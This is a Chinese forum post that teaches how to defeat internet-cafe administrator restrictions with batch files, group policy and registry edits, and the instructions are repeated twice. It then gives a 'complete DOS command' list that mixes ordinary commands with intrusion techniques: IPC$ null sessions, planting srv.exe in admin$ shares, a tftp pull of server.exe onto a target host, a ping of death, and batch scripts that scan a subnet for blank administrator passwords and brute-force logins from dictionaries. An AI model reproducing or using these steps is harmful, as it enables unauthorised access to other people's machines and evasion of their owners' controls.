用dos命令破解网吧限制的方法和dos命令全集[color]

用dos命令破解网吧限制的方法和dos命令全集[color]

这是我收集的破解网吧限制的一些方法仅供大家学习参考哈~~

一：就是网吧限制本地硬盘的访问。

一般情况下这有两种可能，一种就是简单的隐藏掉，另外一种是不但隐藏而且还禁止访问。而根据操作系统的不同，我发现一般98的系统都只是简单的隐藏，而XP或者2K的系统会做禁止访问限制。

对简单的隐藏，要破解很简单。利用批处理文件来：

新建（或者打开）一个记事本文件，输入：

start c:\

然后另存为bat为后缀的，文件名可以随便取，但是后缀名一定要为bat。比如123.bat，这样就是一个简单的批处理文件了。

双击这个bat批处理文件，运行的效果就是打开C盘。这里简单解释一下这个批处理命令start的意义，其实从字面就可以看出，这个命令就相当于“运行”比如你要运行命令提示符，也可以输入：start command

而这个start其实就是个dos命令，批处理文件其实可以简单地理解成可以自动运行dos命令的文件，当然批处理的功能并不是只这么简单，大家理解就可以了！

如果是XP或者2K的系统，你运行上面的批处理文件提示“本次操作由于这台计算机的限制而被取消。请与您的系统管理员联系。”那就是被禁止访问了，可以从组策略那里进行更改设置。

同样，因为网吧一般不会开运行给你，系统盘又限制了，我们只能再次利用批处理文件来运行打开组策略。

这次输入：

start gpedit.msc

然后同样另存为bat文件，gpedit.msc就是组策略。打开组策略，“用户配置——管理模板——windows组件——windows资源管理器”这个目录下有个选项“防止从我的电脑访问驱动器”呵呵，看到了吧，设置成已禁用，就OK了。然后再用start c:\就可以打开C盘了。这里大家肯定会发现组策略里面有好多相关的限制，比如隐藏驱动器也在那里，都可以设置，呵呵，这个大家自己发掘这里暂时不说太多了。

二：文件被隐藏，进了本地硬盘竟然发现一个文件都没有。

解决的办法，不同程度的限制就分下面几种不同的程度解决：

1：最简单的，就是直接在“文件夹选项——查看——”这里有个显示所有文件的选项，点选就可以显示所有的文件了。

2：98的文件夹选项是在查看菜单下，2K和XP的是在工具菜单下。一般98的文件夹选项会在，而XP的在组策略里可以设置隐藏。对于XP，打开组策略“用户配置——管理模板——windows组件——windows资源管理器”这个目录下有个选项“从工具菜单删除文件夹选项”设置成已禁用，就搞定了。

当然98的系统，也可以把那个文件夹选项弄没，那我们要使它显示出来，可以打开注册表，按常理在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\这里就是文件夹选项的注册表键值了。但如果98要是把这全删了（我是有遇见过这么BT的网管……）我们想改也没法改，就只能导入注册表文件来搞定

因为注册表内容比较多，这里就不复制过来了，大家直接去下载本帖所带的附件“文件夹显示.reg”直接导入就可以了。现在就可以直接设置了。

3：打开文件夹选项后发现没有“显示所有文件”这个怎么办？不用着急，同样的道理也是在注册表限制的，如果你是按照第2步那样导入了整个注册表文件，那就不会出现这种情况。

如果是XP的用组策略使文件夹选项显示出来的，那只要新建个记事本，输入下面红色的字，然后另存为123.reg。

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL]

"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"

"Text"="显示所有文件"

"Type"="radio"

"CheckedValue"=dword:00000001

"ValueName"="Hidden"

"DefaultValue"=dword:00000000

"HKeyRoot"=dword:80000001

"HelpID"="update.hlp#51105"

然后双击该文件导入注册表就可以。

4：上面三种情况都是针对文件夹选项来破限制的，相信应该可以解决大部分的问题了。但是还有其他的办法，就是使用attrib这个DOS命令解除文件的隐藏属性，甚至系统属性都可以解除。不过这个有个缺点就是你得事先知道系统有哪些文件（其实这并不是什么难关，系统就那么点文件夹都差不多呵呵）。

具体的操作步骤是这样的：

先打开命令提示符，我们要习惯把命令提示符当运行菜单来使用。怎么打开命令提示符？晕，同样的道理98的系统用“start command”XP的系统用“start cmd”保存成批处理文件运行……这个道理以后就不再说了，举一反三是最基本的学习能力。

然后在命令提示符里输入：

attrib 目标文件或文件夹 -h

这个就去掉了该文件或文件夹的隐藏属性。参数“-”表示去掉，“h”就是隐藏的属性参数。同样如果要隐藏某文件可以用“+h”。

attrib这个命令还可以这样用：

attrib *.* -h

显示所有的文件，但是记住，这样并不能显示所有的文件夹……应该是没有批量显示所有文件夹的功能……这个大家多看看网络上基础的知识就懂了。不说太多了。

三：注册表被限制。这也有两种情况。

1。当我们打开regedit时候提示禁止使用注册表，这个表示虽然打不开注册表编辑器但是我们还可以用reg文件导入的办法进行修改编辑注册表。同样也可以用导入的办法解除禁止。具体的方法很简单，网络上随便都可以查到，就是写个reg文件，内容下面红色字体：

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

"DisableRegistryTools"=dword:00000000

这样就可以打开注册表编辑器了。

2。当想导入注册表文件时候提示“注册表被管理员停用，请与系统管理员联系”时候，就应该是XP而非98的操作系统了。解除办法同样是组策略里

打开组策略“用户配置——管理模板——系统”这个目录下有个“阻止访问注册表编辑工具”设置成已禁用就搞定了。

四：下载限制。

这个我曾经遇见过搞不定的情况，所以本来很不想说。因为一个网吧如果开出来连下载都限制的话，那网管估计是个垃圾白痴了。要换做我绝对不去这样的网吧上。闲话就不多说了，这里简单介绍几种可能破解下载限制的办法

1：最简单的使用在线安装工具，在线下载之类的。或者QQ网络硬盘下载TT安装，用TT自带的下载工具就可以下载。

但是有点麻烦的是QQ网络硬盘被屏蔽了的话就不好办了，如果对方是修改了QQ的dll文件来达到这种目的的话，那还要你们自己去找找想关的修改资料，我没弄过。如果只是QQ的系统设置那里进行隐藏的话那我们可以自己破，打开QQ菜单“个人设置——系统设置——面板设置——系统面板”这里可以设置相关的面板隐藏或者显示，不过我估计现在网吧都是修改dll文件来彻底的删掉网络硬盘的，所以这招估计不见效！

2：如果在线安装时候因为internet选项的设置，导致在线安装控件不能运行的话，那就要进internet选项进行设置了。不过网吧一般限制设置internet选项，要破这个限制可以进系统安装目录一般的都是c:\windows\system(XP的是system32）inetcpl.cpl的文件，这个文件就是internet选项的设置文件。

如果是万象的网吧，那这个文件名会被改成inetcpl.cpp，只要把后缀名改成cpl就可以打开了！（到这里了别再跟我说进系统盘还进不了……-_-bb！）

打开internet选项，这里其实本身可以做一个下载的限制，就是“安全——internet——自定义级别——下载”这里可以设置禁止下载和允许下载，如果只是这样限制的话那就已经可以破下载了。不过一般现在没这么简单了。现在把在线运行控件的限制解除了吧，同样在“安全——internet——自定义级别——ActiveX控件和插件“这里设置一下启用就可以了。

而如果这样还是不行，还是不能解除下载限制的话，可以考虑是否被修改注册表了。自己去网络上搜索注册表的键，我这里不能全写出来，因为我曾经看过一篇文章，关于下载的键不少，复制过来也是浪费篇幅，大家也得学会自己搜索。有时候网吧的限制，手动无法破解也是事实，毕竟人家是用软件做的这么多限制的……呵呵！

五：其他一些遇见过的小问题

有的时候你运行gpedit.msc时候会提示找不到文件名找不到该组件，这就是管理员修改了gpedit.msc的文件名了。可以先运行mmc，打开mmc管理器，然后添加系统组件，那里找到组策略然后添加，就可以了！还有，如果管理员将gpedit.dll也改名甚至删除，那用MMC也添加不到了~~！！有啥办法吗？那就是自己打包gpedit.msc和gpedit.dll放到网络硬盘去……

暂时就想到这些，如果还有什么补充的或者谬误的地方欢迎各位添加和纠正`````~~[color]

这是我收集的破解网吧限制的一些方法仅供大家学习参考哈~~

一：就是网吧限制本地硬盘的访问。

一般情况下这有两种可能，一种就是简单的隐藏掉，另外一种是不但隐藏而且还禁止访问。而根据操作系统的不同，我发现一般98的系统都只是简单的隐藏，而XP或者2K的系统会做禁止访问限制。

对简单的隐藏，要破解很简单。利用批处理文件来：

新建（或者打开）一个记事本文件，输入：

start c:\

然后另存为bat为后缀的，文件名可以随便取，但是后缀名一定要为bat。比如123.bat，这样就是一个简单的批处理文件了。

双击这个bat批处理文件，运行的效果就是打开C盘。这里简单解释一下这个批处理命令start的意义，其实从字面就可以看出，这个命令就相当于“运行”比如你要运行命令提示符，也可以输入：start command

而这个start其实就是个dos命令，批处理文件其实可以简单地理解成可以自动运行dos命令的文件，当然批处理的功能并不是只这么简单，大家理解就可以了！

如果是XP或者2K的系统，你运行上面的批处理文件提示“本次操作由于这台计算机的限制而被取消。请与您的系统管理员联系。”那就是被禁止访问了，可以从组策略那里进行更改设置。

同样，因为网吧一般不会开运行给你，系统盘又限制了，我们只能再次利用批处理文件来运行打开组策略。

这次输入：

start gpedit.msc

然后同样另存为bat文件，gpedit.msc就是组策略。打开组策略，“用户配置——管理模板——windows组件——windows资源管理器”这个目录下有个选项“防止从我的电脑访问驱动器”呵呵，看到了吧，设置成已禁用，就OK了。然后再用start c:\就可以打开C盘了。这里大家肯定会发现组策略里面有好多相关的限制，比如隐藏驱动器也在那里，都可以设置，呵呵，这个大家自己发掘这里暂时不说太多了。

二：文件被隐藏，进了本地硬盘竟然发现一个文件都没有。

解决的办法，不同程度的限制就分下面几种不同的程度解决：

1：最简单的，就是直接在“文件夹选项——查看——”这里有个显示所有文件的选项，点选就可以显示所有的文件了。

2：98的文件夹选项是在查看菜单下，2K和XP的是在工具菜单下。一般98的文件夹选项会在，而XP的在组策略里可以设置隐藏。对于XP，打开组策略“用户配置——管理模板——windows组件——windows资源管理器”这个目录下有个选项“从工具菜单删除文件夹选项”设置成已禁用，就搞定了。

当然98的系统，也可以把那个文件夹选项弄没，那我们要使它显示出来，可以打开注册表，按常理在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\这里就是文件夹选项的注册表键值了。但如果98要是把这全删了（我是有遇见过这么BT的网管……）我们想改也没法改，就只能导入注册表文件来搞定

因为注册表内容比较多，这里就不复制过来了，大家直接去下载本帖所带的附件“文件夹显示.reg”直接导入就可以了。现在就可以直接设置了。

3：打开文件夹选项后发现没有“显示所有文件”这个怎么办？不用着急，同样的道理也是在注册表限制的，如果你是按照第2步那样导入了整个注册表文件，那就不会出现这种情况。

如果是XP的用组策略使文件夹选项显示出来的，那只要新建个记事本，输入下面红色的字，然后另存为123.reg。

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL]

"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"

"Text"="显示所有文件"

"Type"="radio"

"CheckedValue"=dword:00000001

"ValueName"="Hidden"

"DefaultValue"=dword:00000000

"HKeyRoot"=dword:80000001

"HelpID"="update.hlp#51105"

然后双击该文件导入注册表就可以。

4：上面三种情况都是针对文件夹选项来破限制的，相信应该可以解决大部分的问题了。但是还有其他的办法，就是使用attrib这个DOS命令解除文件的隐藏属性，甚至系统属性都可以解除。不过这个有个缺点就是你得事先知道系统有哪些文件（其实这并不是什么难关，系统就那么点文件夹都差不多呵呵）。

具体的操作步骤是这样的：

先打开命令提示符，我们要习惯把命令提示符当运行菜单来使用。怎么打开命令提示符？晕，同样的道理98的系统用“start command”XP的系统用“start cmd”保存成批处理文件运行……这个道理以后就不再说了，举一反三是最基本的学习能力。

然后在命令提示符里输入：

attrib 目标文件或文件夹 -h

这个就去掉了该文件或文件夹的隐藏属性。参数“-”表示去掉，“h”就是隐藏的属性参数。同样如果要隐藏某文件可以用“+h”。

attrib这个命令还可以这样用：

attrib *.* -h

显示所有的文件，但是记住，这样并不能显示所有的文件夹……应该是没有批量显示所有文件夹的功能……这个大家多看看网络上基础的知识就懂了。不说太多了。

三：注册表被限制。这也有两种情况。

1。当我们打开regedit时候提示禁止使用注册表，这个表示虽然打不开注册表编辑器但是我们还可以用reg文件导入的办法进行修改编辑注册表。同样也可以用导入的办法解除禁止。具体的方法很简单，网络上随便都可以查到，就是写个reg文件，内容下面红色字体：

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

"DisableRegistryTools"=dword:00000000

这样就可以打开注册表编辑器了。

2。当想导入注册表文件时候提示“注册表被管理员停用，请与系统管理员联系”时候，就应该是XP而非98的操作系统了。解除办法同样是组策略里

打开组策略“用户配置——管理模板——系统”这个目录下有个“阻止访问注册表编辑工具”设置成已禁用就搞定了。

四：下载限制。

这个我曾经遇见过搞不定的情况，所以本来很不想说。因为一个网吧如果开出来连下载都限制的话，那网管估计是个垃圾白痴了。要换做我绝对不去这样的网吧上。闲话就不多说了，这里简单介绍几种可能破解下载限制的办法

1：最简单的使用在线安装工具，在线下载之类的。或者QQ网络硬盘下载TT安装，用TT自带的下载工具就可以下载。

但是有点麻烦的是QQ网络硬盘被屏蔽了的话就不好办了，如果对方是修改了QQ的dll文件来达到这种目的的话，那还要你们自己去找找想关的修改资料，我没弄过。如果只是QQ的系统设置那里进行隐藏的话那我们可以自己破，打开QQ菜单“个人设置——系统设置——面板设置——系统面板”这里可以设置相关的面板隐藏或者显示，不过我估计现在网吧都是修改dll文件来彻底的删掉网络硬盘的，所以这招估计不见效！

2：如果在线安装时候因为internet选项的设置，导致在线安装控件不能运行的话，那就要进internet选项进行设置了。不过网吧一般限制设置internet选项，要破这个限制可以进系统安装目录一般的都是c:\windows\system(XP的是system32）inetcpl.cpl的文件，这个文件就是internet选项的设置文件。

如果是万象的网吧，那这个文件名会被改成inetcpl.cpp，只要把后缀名改成cpl就可以打开了！（到这里了别再跟我说进系统盘还进不了……-_-bb！）

打开internet选项，这里其实本身可以做一个下载的限制，就是“安全——internet——自定义级别——下载”这里可以设置禁止下载和允许下载，如果只是这样限制的话那就已经可以破下载了。不过一般现在没这么简单了。现在把在线运行控件的限制解除了吧，同样在“安全——internet——自定义级别——ActiveX控件和插件“这里设置一下启用就可以了。

而如果这样还是不行，还是不能解除下载限制的话，可以考虑是否被修改注册表了。自己去网络上搜索注册表的键，我这里不能全写出来，因为我曾经看过一篇文章，关于下载的键不少，复制过来也是浪费篇幅，大家也得学会自己搜索。有时候网吧的限制，手动无法破解也是事实，毕竟人家是用软件做的这么多限制的……呵呵！

五：其他一些遇见过的小问题

有的时候你运行gpedit.msc时候会提示找不到文件名找不到该组件，这就是管理员修改了gpedit.msc的文件名了。可以先运行mmc，打开mmc管理器，然后添加系统组件，那里找到组策略然后添加，就可以了！还有，如果管理员将gpedit.dll也改名甚至删除，那用MMC也添加不到了~~！！有啥办法吗？那就是自己打包gpedit.msc和gpedit.dll放到网络硬盘去……

暂时就想到这些，如果还有什么补充的或者谬误的地方欢迎各位添加和纠正`````~~[color]

dos命令全集

其实dos的功能十分的强大，不光有上面的这些。在这我把我收集的dos命令给大家仅供大家学习参考哈~~~

net use \\ip\ipc$ " " /user:" "建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名"建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名"直接登陆后映射对方C：到本地为H:

net use h: \\ip\c$登陆后映射对方C：到本地为H:

net use \\ip\ipc$ /del删除IPC链接

net use h: /del删除映射对方到本地的为H:的映射

net user 用户名密码/add建立用户

net user guest /active:yes激活guest用户

net user查看有哪些用户

net user 帐户名查看帐户的属性

net localgroup administrators 用户名 /add把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

net start查看开启了哪些服务

net start 服务名开启服务；(如:net start telnet， net start schedule)

net stop 服务名停止某服务

net time \\目标ip查看对方时间

net time \\目标ip /set设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view查看本地局域网内开启了哪些共享

net view \\ip查看对方局域网内开启了哪些共享

net config显示系统网络设置

net logoff断开连接的共享

net pause 服务名暂停某服务

net send ip "文本信息"向对方发信息

net ver局域网内正在使用的网络连接类型和信息

net share查看本地开启的共享

net share ipc$开启ipc$共享

net share ipc$ /del删除ipc$共享

net share c$ /del删除C：共享

net user guest 12345用guest用户登陆后用将密码改为12345

net password 密码更改系统登陆密码

netstat -a查看开启了哪些端口,常用netstat -an

netstat -n查看端口的网络连接情况，常用netstat -an

netstat -v查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip查看某协议使用情况（查看tcp/ip协议使用情况）

netstat -s查看正在使用的所有协议使用情况

nbtstat -A ip对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名)跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

ping ip(或域名)向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip死亡之ping(发送大于K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg)用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

tlist -t以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

del /S /Q 目录 或用：rmdir /s /Q 目录/S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）

move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt > 3st.txt对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令

at id号开启已注册的某个计划任务

at /delete停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete停止某个已注册的计划任务

at查看所有的计划任务

at \\ip time 程序名(或一个命令) /r在某时间运行对方某程序并重新启动计算机

finger username @host查看最近有哪些用户登陆

telnet ip 端口远和登陆服务器,默认端口为23

open ip连接到IP（属telnet登陆后的命令）

telnet在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1路径\文件名2 /y复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \\ip\admin$复制本地c:\srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件

copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.*复制对方admini$共享下的srv.exe文件（所有文件）至本地C：

xcopy 要复制的文件或目录树目标地址\目录名复制文件和目录树，用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送

tftp -i 对方IPput c:\server.exe登陆后，上传本地c:\server.exe至主机

ftp ip 端口用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

route print显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface

arp查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min新开一个新窗口并最大化（最小化）运行某程序或命令

mem查看cpu使用情况

attrib 文件名(目录名)查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性

dir查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符设置环境变量

set显示当前所有的环境变量

set p(或其它字符)显示出当前以字符p(或其它字符)开头的所有环境变量

pause暂停批处理程序，并显示出：请按任意键继续....

if在批处理程序中执行条件处理（更多说明见if命令及变量）

goto 标签将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）

call 路径\批处理文件名从批处理程序中调用另一个批处理程序 （更多说明见call /?）

for对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）

echo on或off打开或关闭echo，仅用echo不加参数则显示当前echo设置

echo 信息在屏幕上显示出信息

echo 信息 >> pass.txt将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt在aa.txt文件中寻找字符串hello

find 文件名查找某文件

title 标题名字更改CMD窗口标题名字

color 颜色值设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )

print 文件名打印文本文件

2ver在DOS窗口下显示版本信息

winver弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）

format 盘符 /FS:类型格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS

md目录名创建目录

replace 源文件要替换文件的目录替换文件

ren 原文件名新文件名重命名文件名

tree以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称

type 文件名显示文本文件的内容

more 文件名 逐屏显示输出文件

doskey 要锁定的命令＝字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=

taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误

tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe

path 路径\可执行文件的文件名 为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?

regedit /s 注册表文件名导入注册表；参数/S指安静模式导入，无任何提示；

regedit /e 注册表文件名 导出注册表

cacls 文件名参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。

cacls 文件名查看文件的访问用户权限列表

REM 文本内容在批处理文件中添加注解

netsh查看或更改本地网络配置情况

IIS服务命令：

iisreset /reboot重启win2k计算机（但有提示系统将重启信息出现）

iisreset /start或stop启动（停止）所有Internet服务

iisreset /restart停止然后重新启动所有Internet服务

iisreset /status显示所有Internet服务状态

iisreset /enable或disable在本地系统上启用（禁用）Internet服务的重新启动

iisreset /rebootonerror当启动、停止或重新启动Internet服务时，若发生错误将重新开机

iisreset /noforce若无法停止Internet服务，将不会强制终止Internet服务

iisreset /timeoutVal在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。

FTP 命令： (后面有详细说明内容)

ftp的命令行格式为:

ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。

－d 使用调试方式。

－n 限制ftp的自动登录,即不使用.netrc文件。

－g 取消全局文件名。

help [命令] 或 ？[命令] 查看命令说明

bye 或 quit 终止主机FTP进程,并退出FTP管理方式.

pwd 列出当前远端主机目录

put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中

get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中

mget [remote-files]从远端主机接收一批文件至本地主机

mput local-files 将本地主机中一批文件传送至远端主机

dir 或 ls [remote-directory] [local-file]列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件

ascii 设定以ASCII方式传送文件(缺省值)

bin 或 p_w_picpath 设定以二进制方式传送文件

bell 每完成一次文件传送,报警提示

cdup 返回上一级目录

close 中断与远程服务器的ftp会话(与open对应)

open host[port] 建立指定ftp服务器连接,可指定连接端口

delete 删除远端主机中的文件

mdelete [remote-files] 删除一批文件

mkdir directory-name 在远端主机中建立目录

rename [from] [to] 改变远端主机中的文件名

rmdir directory-name 删除远端主机中的目录

status 显示当前FTP的状态

system 显示远端主机系统类型

user user-name [password] [account] 重新以别的用户名登录远端主机

open host [port] 重新建立一个新的连接

prompt 交互提示模式

macdef 定义宏命令

lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录

chmod 改变远端主机的文件权限

case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母

cd remote－dir 进入远程主机目录

cdup 进入远程主机目录的父目录

! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip

MYSQL 命令：

mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。

（例：mysql -h110.110.110.110 -Uroot -P123456

注:u与root可以不用加空格，其它也一样）

exit 退出MYSQL

mysqladmin -u用户名 -p旧密码 password 新密码 修改密码

grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）

show databases;显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。

use mysql；

show tables;显示库中的数据表

describe 表名; 显示数据表的结构

create database 库名;建库

use 库名；

create table 表名 (字段设定列表)； 建表

drop database 库名;

drop table 表名； 删库和删表

delete from 表名;将表中记录清空

select * from 表名; 显示表中的记录

mysqldump --opt school>school.bbb备份数据库：（命令在DOS的\\mysql\\bin目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。

win系统下新增命令（实用部份）：

shutdown /参数关闭或重启本地或远程主机。

参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。

例：shutdown /r /t 0 立即重启本地主机（无延时）

taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。

参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。

tasklist显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。

参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。

Linux系统下基本命令： 要区分大小写

uname显示版本信息（同win2K的 ver）

dir显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）

pwd查询当前所在的目录位置

cdcd..回到上一层目录，注意cd 与..之间有空格。cd/返回到根目录。

cat 文件名查看文件内容

cat >abc.txt往abc.txt文件中写上内容。

more 文件名以一页一页的方式显示一个文本文件。

cp复制文件

mv移动文件

rm 文件名删除文件，rm -a 目录名删除目录及子目录

mkdir 目录名建立目录

rmdir删除子目录，目录内没有文档。

chmod 设定档案或目录的存取权限

grep 在档案中查找字符串

diff 档案文件比较

find 档案搜寻

date现在的日期、时间

who查询目前和你使用同一台机器的人以及Login时间地点

w 查询目前上机者的详细资料

whoami查看自己的帐号名称

groups 查看某人的Group

passwd 更改密码

history 查看自己下过的命令

ps 显示进程状态

kill 停止某进程

gcc ***通常用它来编译C语言写的文件

su权限转换为指定使用者

telnet IPtelnet连接对方主机（同win2K），当出现bash$时就说明连接成功。

ftp ftp连接上某服务器（同win2K）

3附：批处理命令与变量

1：for命令及变量 基本格式：

FOR /参数 %variable IN (set) DO command [command_parameters]%variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。

批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}

command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开

command_parameters：为特定命令指定参数或命令行开关

IN (set)：指在(set)中取值；DO command ：指执行command

参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。

用法举例：

@echo off

echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt

存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。

/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。

@echo off

echo 用法格式：ok.bat ip

FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200

存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。

2：if命令及变量 基本格式：

IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。

